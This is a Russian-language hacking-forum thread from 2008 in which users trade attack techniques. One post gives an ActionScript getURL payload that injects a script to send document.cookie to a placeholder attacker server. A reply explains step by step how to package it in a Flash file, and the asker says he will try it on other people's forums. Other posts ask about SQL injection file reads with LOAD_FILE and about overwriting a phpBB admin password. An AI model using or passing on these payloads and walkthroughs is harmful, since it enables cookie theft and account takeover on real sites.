ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2181  
Старый 30.05.2008, 18:13
SeeJay
Новичок
Регистрация: 21.02.2006
Сообщений: 18
Провел на форуме:
163552

Репутация: 1
По умолчанию

И еще вопрос (извините, если замучил)…
Насколько я понимаю данный баг надо впихивать через флешку (swf)??

Код:
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java  script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
 
Ответить с цитированием

  #2182  
Старый 30.05.2008, 18:15
[:|||||:]
Banned
Регистрация: 29.05.2008
Сообщений: 116
Провел на форуме:
447871

Репутация: 208
Отправить сообщение для [:|||||:] с помощью ICQ Отправить сообщение для [:|||||:] с помощью AIM Отправить сообщение для [:|||||:] с помощью MSN Отправить сообщение для [:|||||:] с помощью Yahoo
По умолчанию

да, это ActionScript- язык сценариев, иcпользуемый в Flash
 
Ответить с цитированием

  #2183  
Старый 30.05.2008, 18:21
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

SeeJay
Тебе понадобится Flash-редактор "Marcomedia Flash" версии 8 или более, а так же браузер с установленным flash-плагином. С помощью Flash-ролика заставим браузер выполнить простейший JS-код:
Цитата:
alert('Flash XSS!');
Открой Macromedia Flash и создай новый ролик. В первом кадре нарисуй что угодно. Затем на линии кадров кликни правой кнопкой мыши на первом кадре и, в появившемся меню, выбери пункт "Actions". Внизу появится текстовое поле для AS-кода. В этом поле ты должен вписать код который вызовет выполнение JS-сценария.
Сделать это можно с помощью функции getURL() которой в виде единственного параметра нужно передать следующую
строку: "javascript:код". У тебя должна получится всего одна строка следующего содержания:
Цитата:
getURL("javascript:alert('Flash XSS!')");
в твоем случае это:
Цитата:
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
Сохрани полученный Flash-ролик в какой-либо папке, опубликуй (меню File->Publish) и в ней же создай html-файл следующего содержания:
Цитата:
<object>
<embed src="ФЛЕШКА.swf" type="application/x-shockwave-flash" />
</object>
поидее должно работать) главное не падай в минуса..

Последний раз редактировалось sabe; 30.05.2008 в 18:28..
 
Ответить с цитированием

  #2184  
Старый 30.05.2008, 18:32
SeeJay
Новичок
Регистрация: 21.02.2006
Сообщений: 18
Провел на форуме:
163552

Репутация: 1
По умолчанию

Цитата:
Сообщение от sabe  
SeeJay
Тебе понадобится Flash-редактор "Marcomedia Flash" версии 8 или более, а так же браузер с установленным flash-плагином. С помощью Flash-ролика заставим браузер выполнить простейший JS-код:

Открой Macromedia Flash и создай новый ролик. В первом кадре нарисуй что угодно. Затем на линии кадров кликни правой кнопкой мыши на первом кадре и, в появившемся меню, выбери пункт "Actions". Внизу появится текстовое поле для AS-кода. В этом поле ты должен вписать код который вызовет выполнение JS-сценария.
Сделать это можно с помощью функции getURL() которой в виде единственного параметра нужно передать следующую
строку: "javascript:код". У тебя должна получится всего одна строка следующего содержания:

в твоем случае это:

Сохрани полученный Flash-ролик в какой-либо папке, опубликуй (меню File->Publish) и в ней же создай html-файл следующего содержания:

поидее должно работать) главное не падай в минуса..
Спасибо буду пробовать!
 
Ответить с цитированием

  #2185  
Старый 30.05.2008, 19:09
Spaise
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме:
99208

Репутация: 21
По умолчанию

Написал простенький скрипт на php, подобрал колечество столбцов, вывел USER() и остальную инфу, НО читать файлы не получается. Пользуюсь денвером. Подскажите как файлы читать. Что LOAD_FILE() это я знаю, а путь ни как подобрать не могу.
 
Ответить с цитированием

  #2186  
Старый 30.05.2008, 19:13
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Цитата:
Сообщение от Spaise  
Написал простенький скрипт на php, подобрал колечество столбцов, вывел USER() и остальную инфу, НО читать файлы не получается. Пользуюсь денвером. Подскажите как файлы читать. Что LOAD_FILE() это я знаю, а путь ни как подобрать не могу.
Что за бред, ты юзаешь скрипт на локалхосте и не можешь подобрать путь?
__________________
..
 
Ответить с цитированием

  #2187  
Старый 30.05.2008, 19:16
Kulspruta
Познающий
Регистрация: 20.05.2008
Сообщений: 42
Провел на форуме:
260433

Репутация: 5
По умолчанию

Народ,почему все статьи о взломах есть,кроме php inj??
ПРосьба написать
 
Ответить с цитированием

  #2188  
Старый 30.05.2008, 19:29
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

 
Ответить с цитированием

  #2189  
Старый 30.05.2008, 19:37
SeeJay
Новичок
Регистрация: 21.02.2006
Сообщений: 18
Провел на форуме:
163552

Репутация: 1
По умолчанию

Цитата:
Сообщение от SeeJay  
Спасибо буду пробовать!
Дааааааа…
Форум то мой пропатчен от и до!
Буду пробовать через другие залезать!
Буду, благодарен совету!

С уважением и благодарностью SeeJay!
 
Ответить с цитированием

  #2190  
Старый 30.05.2008, 21:08
brasco2k
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
Провел на форуме:
1215706

Репутация: 310
По умолчанию

как обновить в селект запросе данные в БД?

Цитата:
UPDATE phpbb_users set user_password=81dc9bdb52d04dc20036dbd8313ed055 where username=admin
как это использовать?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ